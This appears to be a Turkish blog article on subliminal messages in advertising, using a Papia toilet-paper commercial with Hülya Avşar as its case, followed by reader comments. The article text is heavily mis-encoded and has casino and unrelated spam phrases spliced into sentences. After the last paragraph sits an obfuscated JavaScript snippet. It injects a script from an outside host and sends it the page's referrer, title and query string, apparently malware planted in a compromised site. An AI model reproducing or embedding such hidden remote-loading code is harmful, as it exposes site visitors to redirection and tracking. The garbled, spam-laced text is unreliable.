- Hoşgeldiniz

KAYITLI ÜYE GİRİŞİ

YENİ ÜYELİK

ÖNE ÇIKAN HABERLER

Reklamlardaki BilinA�altA�

Reklamlardaki BilinA�altA� sitemize 03 Ocak 2013 tarihinde eklenmiş ve 778 kişi tarafından ziyaret edilmiş.

TA?rkiyea�� den reklamcA�lA�k 1990a�� lA� yA�llardan itibaren serbest pazar ekonomisinin gA?ndelik yaAYama daha A�ok yerleAYmesi sonrasA�nda bA?yA?me ivmesini arttA�rmA�AY, bugA?n iA�in yazA�lA� ve gA�rsel medyanA�n gerek temel ekonomik kaynaAYA� gerekse A?reticinin pazarlama stratejisi aA�A�sA�ndan olmazsa olmaz bir tanA�tA�m ve sermaye aracA� haline geldi. HergA?n saatlerce vakit geA�irdiAYimiz kimilerine aptal kutusu, kimilerine gA�re baAYA�mlA�lA�k olan televizyonculuk sektA�rA?nA?n kalbi olan reklamlardan bahsediyoruz.

ReklamcA�lA�k oldukA�a keyfli ve renkli bir “bilim dalA�.” ReklamlarA�n etkiliAYi ve etkileyiciliAYi konusunda biliAYsel ve davranA�AYsal birkaA� model ortaya konmuAY olsa da, TA?rkiye gibi reklam ve reklamcA�lA�k ve rekabet kavramlarA�nA�n henA?z olgunlaAYmaya baAYladA�AYA� A?lkelerde, etkili olmasA� beklenen reklamlarA�n temel vurgusu, yaAYantA�mA�zA�n bir parA�asA� olmasA�ndan ileri gidememektedir.

ReklamlarA�n yapA�landA�rA�lmasA�nda ve kurgulanmasA�nda psikolojiden ayrA�k tutulmasA� neredeyse imkansA�z. Bu yA?zden reklamcA�lar en az bir psikolog / danA�AYman kadar, hatta daha fazla psikolojinin A�zel bir alt dalA� olan hafiza konusunda bilgi birikimlerine sahip.

NasA�l olacak da saniyeler sA?ren bir tanA�tA�m / bir mesaj, tanA�tA�lan A?rA?nA?n gA?venilir, faydalA� ve kullanA�AYlA� olduAYuna karar verdirecek ve kendisini sattA�racak.

Reklam yazarlarA�nA�n ve senaristlerin en birikimli olduAYu konularA�n baAYA�nda beynin iAYleyiAYi, kA�sa ve uzun sA?reli bellek ve aidiat duygusu gelmekte. A�ReklamA�n tanA�mA� ve bir reklamA�n tanA�ttA�AYA� A?rA?nA?n tA?keticiye ulaAYmasA� ve beklenen tA?keticinin satA�n alma davranA�AYA�nA� olumlu anlamda etkilemesi konusunda kA�sa bir deAYerlendirme yaptA�AYA�mA�zda;

  • ReklamA�n gA�rsel, iAYitsel ve yazA�lA� unsurlar tarafA�ndan iletiAYim araA�larA�na sunulan dikkat A�ekici unsurlarA� iA�eriAYinde barA�ndA�rarak temel mesajA� iletme aracA� AYeklinde tanA�mlayabiliriz. KA�saca reklam dA?ne, bugA?ne ve geleceAYe hitap ederek tA?keticiyi harekete geA�irmeye yA�nelik bir iletiAYim modelidir.
  • ReklamA�n bir satA�AY stratejisi olduAYunu varsaydA�AYA�mA�zda her stratejinin olduAYu gibi bu stratejinin de ulaAYmak istediAYi amaA�lar reklam konusu iA�inde geA�erlidir.
  • Reklamlar konusundaki stratejilerin temel A�AYeleri bilgilendirme, yA�nlendirme, zihinde tutma, dikkati yoAYunlaAYtA�rma ve dikkat sA?resini arttA�rma ve satA�n alma davranA�AYA�nA� biA�imlendirme olarak A�zetlenebilir.

Bir reklam sonucunda A?retilen bir A?rA?nA?n tA?keten insan ile buluAYmasA� hedeflendiAYinde reklamA�n planlanmasA� ve amaA�larA�nA�n oluAYturulmasA� kadar tA?keten insanA�n iletiAYim modeline nasA�l hitap edileceAYi de birinci A�ncelik olarak karAYA�mA�za A�A�kA�yor.

Hedefte tA?keten insan davranA�AYA� (ve davranA�AYlarA�nA� yA�nlendiren beyin, beynin nA�rolojik ve psikososyal eAYilimlerini oluAYturan bilinA�altA�) olduAYundan, reklamA�n bilinA�altA�na yerleAYmesi A?rA?nA?n satA�lmasA�nA� doAYurmakta, bu da reklamA�n baAYarA�sA�nA� ilk A�ncelik haline getirmektedir.A�DolayA�sA� ile bir reklamA�n etkiliAYi, salt A?rA?nA?n bilgilendirilmesinden A�te bireyin temel aidiyet duygularA�na hitap etmesi bizim kA?ltA?rA?mA?zde oldukA�a A�nemlidir.

Reklamlarda en A�ok kullanA�lan mesaj A�eAYitlerine baktA�AYA�mA�zda karAYA�mA�za Korku, Espri, MA?zik, Cinsellik ve BilinA�altA� mesajlar olduAYunu gA�rmekteyiz. BilinA�altA� mesaj veren reklamlarA�n kullanA�mA� 3984 sayA�lA� Radyo ve Televizyon Kurulu ve YayA�nlar HakkA�ndaki Kanun nedeni ile yasaklanmA�AY bulunduAYundan her ne kadar denetiminin titizlikle yapA�lmadA�AYA�nA� yA�nA?nde kanaat oluAYsa da, verilmek istenen mesajlar bilinA�altA� ile birleAYtirilerek sunulmaktadA�r.

YukarA�daki yazA�lanlarA� somutlaAYtA�rmak istediAYimde, konuyu hakkA�nda yazA� yazarken izlediAYim televizyonda A�A�kan reklam benim iA�in oldukA�a hoAY bir malzeme oldu. Ortalama bir televizyon izleyicisi HA?lya AvAYara�� A�n Papia markalA� Tuvalet KaAYA�dA� TanA�tA�m ReklamA� izlemiAYtir.

YouTube Preview Image

SeA�ilen reklamA�n konusu HA?lya AvAYar karakteri olduAYunda, reklamA�n daha iyi anlaAYA�labilmesi konusunda HA?lya AvAYar konusunda zihnimizi AvAYar” A�n A?zerine odaklaAYtA�ralA�m. Zira herhangi bir tanA�tA�mA�n akA�lda kalA�cA� ve gA?venilir olmasA� iA�in A?rA?n-Karakter uyumu konusu devreye girmekte.A�A?rA?n karakter uyumunu da baAYka bir yazA� da dile getirebiliriz. AncakA�A?rA?n-Karakter Uyumu konusunu kA�sa aA�A�klamak gerekirse Karakter, sA�zlA?k anlamA� ile bir kimsenin ya da bir insan grubunun tutumu; duygulanma ve davranA�AY biA�imi; bireyin kendi kendisine egemen olmasA�nA�, kendi kendisiyle uyum iA�inde bulunmasA�nA�, dA?AYA?nA?AY ve eylemlerinde tutarlA�, saAYlam kalabilmesini saAYlayan A�zellikler bA?tA?nA?dA?r.A�A�z anlam ise bize bambaAYka bir ifade A?rettirmekte. Karakter, bireyin A�evre tarafA�ndan algA�lanA�AY biA�imi! ReklamcA�lA�kta ise A�bir reklamA�n etkililiAYi ve tA?ketende oluAYturacaAYA� olumlu davranA�AY ve dA?AYA?nceler, reklamda yer alan kiAYinin karakter A�zellikleri ile birlikte anA�lmalA� AYeklinde kodlanmaktadA�r.

A?rA?ne uygun karakterler, karakterlerin AYu anki konumlarA�ndan A�ok bizim karaktere yA?klediAYimiz anlamlar ile bir baAYka ifade ile karakterin bizim bilinA�altA�mA�zdaki anlamlarA� ile baAYdaAYmasA� gerekmektedir.

YukarA�da izlediAYiniz reklamda, HA?lya AvAYar aynA� zamanda manken, AYarkA�cA�, oyuncu, sunucu kimliklerini A�aAYrA�AYtA�rmakta.

YaAYam A�ykA?sA?nA?n detaylarA�na baktA�AYA�mA�zda AvAYar 1963a�� te bir aAYiret ailesinin A�ocuAYu olarak dA?nyaya gelmiAY, her ne kadar doAYu kA?ltA?rA?nA?n bilinen izlerini taAYA�yacaAYA� dA?AYA?nA?lse de BalA�kesir ve Ankara gibi yerlerde geA�irdiAYi yaAYantA�, onun kA?ltA?rel baskA�yA� A?zerinde hissettiAYi dA?AYA?ndA?rmA?yor. Lise online slots eAYitimine devam etmedi ve ilk evliliAYini henA?z 19 yaAYA�nda iken gerA�ekleAYtirdi. 1980a�� lerde BoAYanma kavramA�na yabancA� bir toplum iA�inde kA�sa sA?ren bir evlilik yapan AvAYar, aykA�rA� olmaya belki henA?z kendisi bile farkA�nda deAYilkenA�baAYlamA�AYtA�. Cinsel iA�erikli yayA�nlarla hafA�zalara kazA�nan Bulvar Gazetesia�� nin dA?zenlediAYi gA?zellik yarA�AYmasA�nda 1. seA�ildi. YapmA�AY olduAYu evlilik nedeni ile A�dA?lA? geri alA�nmasA�na raAYmen dgfev online casino Fikrek Hakan ve Salih GA?ney ile birlikte ilk sinema filmini A�evirdi ve gA?zellik kraliA�esi kimliAYi yanA�na oyuncu kimliAYini de eklemiAY oldu.A�Televizyonun aile hayatA�mA�za bir A?yeymiAYcesine eklenmesi zamanlarA�na denk gelen 90a�� lardan itibaren popA?laritenin deAYiAYmesi ile bir sA?re mA?zik eAYitimi aldA� ve 1995a�� te halen bilinen a�?Bu gece uzun olacaka�? isimli AYarkA� ile yeni bir kimlik edindi. O artA�k AYarkA�cA� HA?lya AvAYar idi. HenA?z online casino girmiAY olduAYu mA?zik piyasasA�nda, 2000 yA�lA�nda, halkoylarA� ile seA�ildiAYi, Kral Tv MA?zik A�dA?llerini kazandA�.A�GA?zellik yarA�AYmasA�, oyunculuk ve AYarkA�cA�lA�k konusunda yakaladA�AYA� hA�zlA� baAYarA� ile TA?rkiyea�� de ilk talk show programA�nda sunuculuk yapmaya baAYladA�. TA?m yenilikler adeta HA?lya AvAYar iA�indi ve toplumda bir icon olarak gA�ze A�arpA�yordu.

Tek kiAYilik tiyatro oyunu ile zenginleAYtirdiAYi A�zgeA�miAYi, onun artA�k toplumun her kesimi online slots tarafA�ndan bilinen bir “simge” A�haline dA�nA?AYtA?rdA?. Elbetteki reklam sektA�rA? onu gA�zden kaA�A�ramazdA�. BaAYarA�sA�nA� A?zerine A�alA�AYtA�AYA� her alanda topluma gA�steren AvAYar ilk reklam filminde oynadA�.

ArdA�ndan yapmA�AY olduAYu evlilikler, uzun sA?re gA?ndemden dA?AYmeyen hamileliAYi ve yeniden boAYanmasA� “toplum iA�in bir deAYer” haline gelen HA?lya AvAYara�� A�n sA?rekli gA?ndemde kalmasA�na neden oldu.

HA?lya AvAYara�� A�n tanA�nmaya a�?GA?zellik KraliA�esia�? olarak baAYlamasA�, a�?Karanfilli Naciye, Tutku, A�mrA?mA?n Tek Gecesi, Tele KA�zlar, Sekreter, TapA�lacak KadA�n, ParanA�n Esiri, FatmagA?l”A?n SuA�u Ne, Uzun Bir Gece, KA�srak, AAYk Hikayemiz, AlA�n YazA�m, Sevda AteAYi, AlamancA�nA�n The Pentaho Big hard drive repair plugin configuration PDI 4. KarA�sA�, Berlin in Berlin, Bir KadA�nA�n Anatomisia�? gibi yoAYunlukla kadA�n kimliAYi ile cinselliAYini A�n plana A�A�karmasA�, seslendirdiAYi a�?Saklan Gecelere, AradA�n MA�, BaAYA�na Buyruk, Bu Gece Uzun Olacak, Gel Gir Tekrar Sineme, Sarsam Diyoruma�? AYarkA�larA� ile filmlerdeki A�rA?ntA?yA? birleAYtirmesi onun hafA�zalara kazA�nmasA�na neden oldu.

A?zerine konuAYulacak reklam sA�radan bir tuvalet kaAYA�dA� reklamA� olsa da A?rA?n-Karakter Uyumu” nun A�nemi, bize yukarA�da okuduAYunuz biyografiden A�ok daha fazlasA�nA� A�AYretmek zorunda.A�Toplum tarafA�ndan tanA�nmaya baAYladA�AYA�ndan bu gA?ne deAYin cinsel kimliAYini A�n plana A�A�kararak kendisini ifade eden HA?lya AvAYara�� A�n oynadA�AYA� Papia reklamlarA�ndan biri ortalama 27 saniye. HergA?n binlerce 27 saniye geA�iriyoruz ancak neden bu reklam hafA�zamA�zda?A�27 saniye sA?ren reklamA�n ilk 11 Sn.a�� sinde bir silA?et olarak sergilenen AvAYar”A�nA�kadA�nsA� kimliAYini A�n plana A�A�kmakta ve aA�A�k renklerden oluAYturulan dekorda pembe bir elbise ile yA?rA?mektedir.A�ReklamA�n baskA�n A�zelliklerinden olan a�?kadA�na�? ve a�?kadA�n elbisesinin rengia�? olan pembe, tanA�tA�lan A?rA?nA?n olmasA� gereken A�zelliklerini, bu rengin zihinde uyandA�racaAYA� anlamlara aracA�lA�k etmekte olduAYu aAYikar.

A�yle ki;
a�? marka www.papia.com.tr isimli internet sitesinde de pembe aAYA�rlA�klA� rengi kullanmA�AYtA�r.
a�? Reklamda toplumun her kesimi tarafA�ndan tanA�nan HA?lya AvAYara�� A�n ilk 11 saniye iA�inde silA?et AYeklinde a�?pembe bir elbisea�? giyinmiAY AYekilde ifade edilmesi, pembenin bilinen ilk anlamA� olan kadA�nlA�k-cinsellik ile HA?lya AvAYara�� A�n zihinlerdeki derin anlamlarA�na karAYA�lA�k gelmekte, birbirini A�rtA?AYtA?rmektedir.
a�? AynA� zamanda HA?lya AvAYara�� A�n reklamA�n giriAYinde kullandA�AYA� a�?Ben kimim? GA�rmeseniz de sesimden tanA�dA�nA�z.a�? cA?mlesini aA�tA�AYA�mA�zda a�?Beni gA�rA?nce zaten tanA�rsA�nA�z, ama gA�rmemeniz tanA�manA�za engel deAYil A�A?nkA? ben sizin zihinlerinizde sesim, ses tonum ile de tanA�nabilirim.a�? demek istemek. A�ddialA� ama gerA�ek?
a�? Mavi ne kadar Erkek cinsiyetini temsil ediyor ise, pembe ve kA�rmA�zA� tonlar da kadA�n cinsiyetini temsil etmektedir. Reklamda HA?lya AvAYara�� A�n kadA�n davranA�AYlarA� gerek yA?rA?yA?AYA?nden gerekse ses tonundan anlaAYA�labilmektedir.
a�? DoAYal davranA�AYlarA�mA�z her ne kadar pembe ile kadA�n cinsiyetini, davranA�AYlarA� ve silA?et gA�rA?ntA?sA? ile HA?lya AvAYara�� A� fark etmiAY olsa da reklamA� yapA�lan bir tuvalet kA?AYA�dA�ndan tA?keticinin beklediAYi A?rA?nA?n a�?yumuAYaklA�AYA�a�? ve a�?rahatlA�AYA�dA�r.a�?
a�? KullanA�lan baskA�n rengi incelediAYimizde ise Pembe kelimesinin (rengi) A?nsA?z benzeAYmesi sonucunda (Penbe) FarsA�aa�� dan dilimize girdiAYini A�AYrenmekteyiz. FarsA�aa�� daki anlamA�nA�n a�?pamuka�? ve a�?pamuk A�iA�eAYia�? olan pembe, bize KA?ltA?rel aktarA�mlar neticesinde (pamuk gibi) yumuAYaklA�AYA� algA�latmakta, bilinA� altA�mA�z bize bunu dA?AYA?ndA?rmektedir.
a�? Pembe rengi aynA� zamanda ara tonlardaki bir renktir. Ara tonlardaki renklerin insanA�n kendisini iyi hissetmesine neden olduAYu dA?AYA?nA?lA?r, tA�pkA� turkuaz mavisi ya da fA�stA�k yeAYili gibi. seA�ilen elbise rengi ile tuvalet kaAYA�dA�nA�n yumuAYaklA�AYA�na vurgu yapA�ldA�AYA�nA� bir kez daha gA�rA?lmekte.

Reklam karakterimiz HA?lya AvAYar, reklamA�n baAYA�nda fark edilmiAY olsa da 11. saniyeden itibaren gelen ses efekti ile aktif bir AYekilde reklama katA�lmakta. GA�rA?ntA?nA?n devamA�ndaA�a�?Ben HA?lya AvAYar, bu da Papia. Bazen duyarak bazen gA�rerek tanA�rsA�nA�z.a�? cA?mlesi ile hangi A?rA?nA?n satA�n alA�nmasA� konusundaki tA?ketici zihnindeki muhtemel A�eliAYkilerin farkA�nda olunduAYundan bahsediyor.A�Reklam “AdA� A?stA?nde, Papia. A�A?nkA? daha iyisine layA�ksA�n” cA?mlesi ile sonra ermekte, piyasadaki diAYer A?rA?nlerden daha iyi olduAYu iddiasA� ile henA?z ulaAYamadA�AYA� tA?keticilerin davranA�AYlarA�nA� deAYiAYtirme adA�na tA?keticinin deAYerli olmasA�nA� bu A?rA?nA? kullanma ile A�zdeAYleAYtirmektedir.

HA?lya AvAYara�� A�n bugA?ne deAYin yer aldA�AYA� reklamlara baktA�AYA�mA�zda onun toplumun hangi grubu tarafA�ndan daha gA?venilir (teAYvik edici.) olduAYu konusunda da A�A�karA�mlar yapmak mA?mkA?n. A�lk reklamA�nA� bir cinsel sohbet hattA� tanA�tA�mA�nda yaparken ilerleyen dA�nemlerde “ev kadA�nA�” olarak Bingo ve AltA�nbaAYak reklamA�nda, “hamile” olduAYu dA�nemde Molfix reklamA�nda, gA�zlerinin rengini A�n plana A�A�kararak Filli Boya reklamA�nda, “kA�zA� Zehraa�� nA�n” ergenlik dA�neminde bir kadA�n pedi reklamA� olan Molped reklamA�nda, “boAYanma” olayA� sonrasA�nda genA�lik, A�zgA?rlA?k vurgusunun yapA�ldA�AYA� Pepsi reklamA�nda ve kadA�nsA� kavramlarA�ndan uzaklaAYmaya baAYladA�AYA� son yA�llarda, bir dA�nem kalA�alarA� ile A?nlA? olmasA�ndan A�tA?rA? Papia reklamA�nda yer almasA�, hangi kitleler A?zerinde etkili olabildiAYini gA�stermekte, yer aldA�AYA� hiA�bir reklamda kendisini bugA?ne taAYA�yan cinsel kimlik davranA�AYlarA�ndan ayrA� dA?AYA?nA?lmemesini, davranA�AYlarA� ile doAYrulamaktadA�r.

Netice itibari ile reklamlarA�n bilinA�altA� anlamlarA�nA� aA�A�klamaya A�alA�AYA�yor olsak da aslolan hedef reklamda bulunan-bulunmayan, gA�rA?len ve gA�rA?lmeyen A�AYelerin, gerekse reklam karakterinin A?rA?n ile uyumunu ifade etmeye A�alA�AYtA�k. KA�sa sA?reli bir bellek kullanA�mA�nA�n uzun sA?reye aktarA�mA�nA� saAYlama konusunda profesyonelce davranan reklamcA�lar, bizlere neleri dikkate alarak A�alA�AYtA�klarA�nA� gA�steriyor.

A�oAYu zaman mesleki serzeniAYlerimizde “DanA�AYanA�n hedeflediAYi tutum ve davranA�AYlarA�n sA?reAYenliAYini saAYlayamamak.” gelmekte. Bunu baAYarmamA�z gerek mesleki doyumumuzu gerekse danA�AYana saAYlayacaAYA�mA�z faydayA� arttA�racaAYA�nA� da biliyoruz. ReklamcA�larA�n A?rA?nA?n akA�lca kalA�cA�lA�AYA� konusundaki davranA�AYlarA�, bizlerin davranA�AY deAYiAYikliklerinin sA?rdA?rA?lebilir olmasA� konusunda teAYvik edici olaibilir.

var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

Sitemizdeki Benzer İçerikler

Yorumlar

İsminiz
E-Posta Adresiniz
Yorumunuz
Tuna Yılmaz
07 Ocak 2013 - 12:21

Olgukça hoş bir çalışma olmuş. Son cümle daha çok hoşuma gitti. Sürdürülebilir değişimler ancak hareketler içinde olaibilir:) Elinize sağlık Ercan Bey.

Sultan Sevimli
07 Ocak 2013 - 13:34

Rahatlıkla neden-sonuç ilişkisi kurabileceğimiz ve reklamların psikolojik temeli için farkındalık uyandıran bir yazı olmuş.İtinalı bir yazı olmuş.Tebrik ederim

PsikolojikAnaliz
10 Şubat 2013 - 00:14

Elinize sağlık Ercan Bey. Çok güzel bir yazı olmuş..

Ercan TEKİN
10 Şubat 2013 - 00:16

Teşekkürler Arkadaşlar.